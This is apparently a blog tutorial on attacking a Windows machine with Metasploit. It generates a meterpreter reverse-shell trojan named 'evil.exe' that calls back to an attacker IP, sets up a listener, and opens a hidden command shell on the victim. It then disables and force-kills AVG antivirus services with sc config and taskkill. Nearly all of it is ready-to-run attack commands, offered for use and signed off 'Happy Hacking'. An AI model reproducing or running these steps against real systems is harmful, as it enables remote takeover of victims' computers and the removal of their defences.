Killing the Antivirus with MetaSploit

This post explains one of the ways of killing the Anti Virus Engine (AVG in this tutorial) Process using the Metasploit Framework .

Create a trojan Malware using MsfPayload utility :

msfpayload windows/meterpreter/reverse_tcp LHOST=<your_attacker_IP> LPORT=<4444> X>evil.exe

Set Up the msfConsole :
set exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_attacker_IP>
set LPORT <4444>

Execute the Trojan in the Victim VM and you must get reverse connection as in the Screenshot :
meterpreter > run killav.rb {doesnt work}

The AV process is ReSpawning process . Even if killed once by Killav.rb , will respawn in the OS. Now the Hacking Begins :

meterpreter > execute -H -f cmd.exe -c {This command creates a Command shell on the Victim and a new Channel for Metasploit to interact}
meterpreter > interact <channel_number>

Now one must get the Shell of the Victim Machine .
C:\> tasklist

As we are quiet sure that the AVG is running as a service , we give a command to list the running services :
C:\> tasklist /SVC

Getting a Distilled look at the Services :
C:\> tasklist /SVC | find /I “avg”

Now to further Investigate into the AVD WatchDOG service :
C:\> sc queryex avg9wd

You can do this for each of the AV service .
The important thing to note here is of the service is a STOPABLE or NOT-STOPABLE (Look under STATE) . Then try and Stop them Accordingly :

STOPABLE : net stop service-name
net stop avg9emc

NOT-STOPABLE : To stop the NOT-STOPABLE service we change the service Configuration so the service is not REspawned :
C:\> sc config avg9emc start disabled
C:\> sc config avg9wd start disabled

Do this for all the services so they are not restarted once killed or system is restarted.  Now we Force Kill these Services :
C:\> taskill /F /IM “avg*” or
C:\> taskill /F /PID 1220 {where 1220 is the PID of process to kill}

F opttion is for Force kill . We killed all AVG services in this one command.

The Idea is to :
Exploit the System -> Locate Antivirus Process -> Disable services ->Kill Tasks .
Happy Hacking !!



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s